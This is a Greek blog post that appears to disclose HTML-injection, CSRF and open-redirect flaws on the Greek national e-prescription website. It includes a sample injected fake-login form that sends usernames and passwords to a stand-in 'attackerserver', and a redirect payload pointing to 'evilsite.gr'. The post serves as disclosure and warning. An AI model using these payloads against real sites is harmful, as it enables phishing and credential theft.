Γνωρίζετε το e-Prescription. Για όσους δεν το γνωρίζουν, η υπηρεσία είναι το νέο ενιαίο σύστημα συνταγογράφησης, που τρέχει από το 2013.
Με το σύστημα e-Prescription ο ΕΟΠΥΥ μπορεί να «βλέπει» σε πραγματικό χρόνο την πορεία της εκτέλεσης ενός παραπεμπτικού για μία διαγνωστική εξέταση ή μία θεραπεία, από τη στιγμή που γράφεται μία συνταγή, μέχρι τη στιγμή που υποβάλλεται στο διαγνωστικό κέντρο ή το φυσικοθεραπευτήριο.
Στο σύστημα αναρτάται σε μορφή PDF και το τιμολόγιο. Με αυτό τον τρόπο δεν θα μπορεί να εκτελεστεί δεύτερη φορά το ίδιο παραπεμπτικό, ενώ ο ΕΟΠΥΥ μπορεί ελέγχει και θα εκκαθαρίζει τις δαπάνες του άμεσα και εξολοκλήρου ηλεκτρονικά χωρίς να χρειάζεται να αντιπαραβάλει τα καθαυτά φύλλα των παραστατικών.
Παράλληλα, στο σύστημα είναι καταχωρημένα όλα τα ιατρικά μηχανήματα των παρόχων και τα τεχνικά χαρακτηριστικά τους, οπότε κάθε φορά που ένας ασθενής θα κάνει μία εξέταση το σύστημα θα γνωρίζει από τι δυναμικότητας μηχάνημα έγινε και ανάλογα θα γίνεται και η διαβάθμιση της χρέωσης. (Πληροφορίες από το ΣΚΑΙ)
Δεν είναι λίγες οι φορές που έχουμε αναφερθεί στο Cross-Site Scripting. Είναι μία πολύ πολύ επικίνδυνη ευπάθεια που μπορεί να σου διαλύσει το site,την φήμη και να εκθέσει τα δεδομένα των χρηστών σου. Αν δεν το πιστεύεις αυτό τότε κανένας δεν μπορεί να σε σώσει από την αφέλεια σου
Όλη η υποδομή σου βρίσκεται σε κίνδυνο και δεν έχει καμία απολύτως σημασία αν έχεις Oracle σαν βάση κ JSP,ASP με SQL ή αν έχεις πρωτόκολλα κρυπτογράφησης (HTTPS).
Δυστυχώς η ασφάλεια δεν βρίσκεται στην ατζέντα των εταιρειών και των φορέων ακόμη αλλά οι επιθέσεις εξελίσσονται με ταχύτατους ρυθμούς και οι hackers βρίσκονται σε καλύτερο επίπεδο από τους αμυνόμενους.
Ενημερώσαμε την ιστοσελίδα, αλλά ακόμη δεν επικοινώνησε κάποιος μαζί μας, γιαυτό και δεν μπορώ να σας δείξω εικόνες από το PoC. Θα σας περιγράψω όμως όσο καλύτερα μπορώ το πως μπορεί να εκμεταλλευτεί κάποιος μερικά από τα προβλήματα.
Το https://www.e-prescription.gr έχει περισσότερα από ένα προβλήματα. Θα σας αναφέρω μερικά:
HTMLi
CRSF
Unvalidated Redirect
Τι μπορεί να κάνει ο επιτιθέμενος
Να κλέψει τo Session Id του χρήστη
Να καταγράψει τις κινήσεις του ποντικιού και του πληκτρολογίου
Να κλέψει αρχεία από τον υπολογιστή του επιτιθέμενου
Να κάνει επιθέσεις DDoS
Να επιτεθεί στο Intranet
Να δημιουργήσει XSS Shell
1ο Σενάριο Επίθεσης (Client) - HTMLi
Ο επιτιθέμενος θέλει να κλέψει τους κωδικούς των χρηστών και σε αυτό το σενάριο θα χρησιμοποιήσει phishing τεχνικές που με την βοήθεια των Social media δεν θα είναι δύσκολο σας ξεγελάσει.
Τι μπορεί να κάνει με το HTMLi?
To παρακάτω link εξηγεί την ευπάθεια χωρίς να οδηγεί σε πραγματικό path που φανερώνει το κενό ασφαλείας. (Οπότε δεν χρειάζεται να το δοκιμάσετε γιατί θα λάβετε 404).
https://www.e-prescription.gr/vulnerable.php,asp,jsp?name=<h3>Παρακαλώ εισάγεται το Username σας και τον κωδικό σας</h3><form method="POST" action="http://attackerserver/login.php">Όνομα χρήστη:<input type="text" name="username" /><br />Κωδικός: <input type="password" name="password" /><br /><input type="submit" value="Login" /></form><!--
Αν είστε λίγο εξοικειωμένοι με την HTML δεν θα δυσκολευτείτε να καταλάβετε πως έχει δημιουργηθεί μία φόρμα με δύο πεδία και ένα κουμπί αποστολής των στοιχειών σας στο site του επιτιθέμενου.
2o Σενάριο επίθεσης (Administrator) - CSRF
Σε αυτό το σενάριο ο επιτιθέμενος δεν ενδιαφέρεται για τους χρήστες αλλά για τον Administrator.Βρίσκει την ευπάθεια στο site και χρησιμοποιώντας CSRF καταφέρνει να επικοινωνεί με τον WebServer του.
Όταν ο διαχειριστής κοιτάξει τo Log File τότε το script εκτελείται κ μπορεί να συμβούν περίεργα πράγματα.Όπως για παράδειγμα:
Να βρεις το path του log file
Να πάρεις το sessionID του admin
Θα σας δείξω με την βοήθεια του Owasp Mutillidae πως μπορεί να επιτευχθεί και δεν διαφέρει από το πραγματικό πρόβλημα του E-prescription
Βρίσκουμε το πρόβλημα και εισάγουμε τον κακόβουλο κώδικα και όχι απλώς ένα
<script> alert(1)</script>
O διαχειριστής μπαίνει να δει το Log file
και έγινε ένα POST request στον Server του hacker. Τώρα γνωρίζω που βρίσκεται τo log file αλλά φυσικά μπορούν να συμβούν πολλά περισσότερα σενάρια.
Σκεφτείτε επίσης αν υπάρχει XSS για παράδειγμα στο forum με την συγκεκριμένη επίθεση τι μπορεί να συμβεί.
3o Σενάριο επίθεσης (Redirection)
Σε αυτό το σενάριο ο επιτιθέμενος δεν ενδιαφέρεται για e-prescription αλλά θέλει την βοήθεια του για να σας μεταφέρει στο δικό site.Σας στέλνει πχ μία εικόνα που θα έχει ως εξής
1
<img src="http://www.evilsite.gr/1.png" onclick="https://www.e-prescription.gr/?url=http://www.evilsite.gr">
Όταν θα μεταφερθείτε στο site του με την βοήθεια του e-prescription δεν θα είναι δύσκολο να κατέβει στο υπολογιστή σας κάποιο malware ή να σας συμβεί κάτι άλλο.Καλά θα είναι να αποφεύγετε τις ανακατευθύνσεις μέσα από το site σας.
Ένα κενό είναι αρκετό για να ρίξει ένα site όπως το E-prescription και να εκθέσει ευαίσθητα δεδομένα.
Θα ήθελα να συζητήσουμε περισσότερο το πρόβλημα τους αλλά δυστυχώς για λόγους ασφάλειας δεν μπορούμε να το κάνουμε.
Ευελπιστούμε ότι μετά την δημοσίευση των παραπάνω κενών ασφαλείας, οι άμεσα ενδιαφερόμενοι να επικοινωνήσουν μαζί μας.
Όπως προαναφέραμε για λόγους προστασίας της ιστοσελίδας της Εθνικής Συνταγογράφησης και για να μην χρησιμοποιηθεί από κακόβουλους χρήστες δεν δημοσιεύουμε το PoC, το οποίο έχουμε στη διάθεσή μας.
Επιπροσθέτως παραμένουμε στην διάθεση οποιουδήποτε ενδιαφερόμενου από τον φορέα εφόσον χρειαστεί για παρέχουμε περισσότερες λεπτομέρειες.
Τροφή για το μυαλό
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου